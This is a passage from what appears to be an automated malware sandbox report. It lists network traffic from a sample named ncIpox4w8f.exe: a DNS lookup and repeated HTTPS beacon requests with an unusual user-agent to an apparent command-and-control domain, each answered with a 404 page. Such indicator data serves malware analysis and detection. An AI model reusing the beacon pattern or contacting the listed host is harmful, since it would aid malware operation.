                Aug 5, 2022 15:08:26.931838989 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.931852102 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.931905985 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:27.442230940 CEST49760443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:27.442260027 CEST44349760199.79.62.221192.168.2.4

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 15:08:21.293731928 CEST6209953192.168.2.48.8.8.8
                Aug 5, 2022 15:08:21.449959040 CEST53620998.8.8.8192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 5, 2022 15:08:21.293731928 CEST192.168.2.48.8.8.80x95faStandard query (0)vervain.co.inA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 5, 2022 15:08:21.449959040 CEST8.8.8.8192.168.2.40x95faNo error (0)vervain.co.in199.79.62.221A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • vervain.co.in

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.449744199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:22 UTC0OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:22 UTC0INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:22 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:22 UTC0INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.449752199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:23 UTC0OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:23 UTC1INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:23 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:23 UTC1INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.449765199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:38 UTC9OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:38 UTC9INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:38 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:38 UTC10INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.449766199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:39 UTC10OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:39 UTC10INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:39 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:39 UTC11INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.449767199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:41 UTC11OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:41 UTC11INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:41 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:41 UTC11INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.449768199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:42 UTC12OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:42 UTC12INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:42 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:42 UTC12INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.449769199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:43 UTC13OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:43 UTC13INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:43 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:43 UTC13INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.449770199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:45 UTC14OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:45 UTC14INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:45 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:45 UTC14INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.449771199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:46 UTC15OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:46 UTC15INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:46 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:46 UTC15INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.449772199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:47 UTC16OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:47 UTC16INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:47 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:47 UTC16INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.449773199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:48 UTC17OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:49 UTC17INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:49 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:49 UTC17INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.449774199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:50 UTC18OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:50 UTC18INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:50 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:50 UTC18INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.449755199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:24 UTC1OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:24 UTC2INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:24 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Tue, 15 Mar 2022 23:01:27 GMT
                Accept-Ranges: bytes
                Content-Length: 583
                Vary: Accept-Encoding
                Content-Type: text/html
                2022-08-05 13:08:24 UTC2INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.449775199.79.62.221443C:\Users\user\Desktop\ncIpox4w8f.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 13:08:51 UTC19OUTGET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1
                User-Agent: lVali
                Host: vervain.co.in
                2022-08-05 13:08:51 UTC19INHTTP/1.1 404 Not Found
                Date: Fri, 05 Aug 2022 13:08:51 GMT
